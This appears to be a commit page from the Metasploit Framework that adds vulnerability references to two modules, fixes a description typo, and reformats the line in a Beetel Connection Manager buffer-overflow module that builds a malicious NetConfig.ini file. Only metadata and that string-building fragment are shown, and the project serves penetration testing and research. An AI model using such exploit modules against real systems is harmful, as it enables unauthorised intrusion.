Minor fixup for release
* Adds some new refs. * Fixes a typo in a module desc. * Fixes a weird slash continuation for string building (See #2589)bug/bundler_fix
parent
c5778f51d7
commit
84572c58a8
|
@ -30,6 +30,8 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
['CVE', '2013-3617'],
|
['CVE', '2013-3617'],
|
||||||
|
['OSVDB', '99141'],
|
||||||
|
['BID', '63431'],
|
||||||
['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
|
['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
|
|
|
@ -25,6 +25,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
|
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
|
['OSVDB' => '99199'],
|
||||||
|
['BID' => '63411'],
|
||||||
['URL' => 'http://bugs.processmaker.com/view.php?id=13436']
|
['URL' => 'http://bugs.processmaker.com/view.php?id=13436']
|
||||||
],
|
],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
|
|
|
@ -19,7 +19,7 @@ class Metasploit4 < Msf::Exploit
|
||||||
This module exploits a stack-based buffer overflow on Beetel Connection Manager. The
|
This module exploits a stack-based buffer overflow on Beetel Connection Manager. The
|
||||||
vulnerability exists in the parising of the UserName parameter in the NetConfig.ini
|
vulnerability exists in the parising of the UserName parameter in the NetConfig.ini
|
||||||
file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP
|
file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP
|
||||||
SP3 and Windows 7 SP1.b
|
SP3 and Windows 7 SP1.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
@ -62,8 +62,7 @@ class Metasploit4 < Msf::Exploit
|
||||||
def exploit
|
def exploit
|
||||||
section = datastore["SECTION"]
|
section = datastore["SECTION"]
|
||||||
|
|
||||||
sploit = "[#{section}]\r\n" \
|
sploit = "[#{section}]\r\nUserName=#{shell_popper}"
|
||||||
"UserName=#{shell_popper}"
|
|
||||||
|
|
||||||
file_create(sploit)
|
file_create(sploit)
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue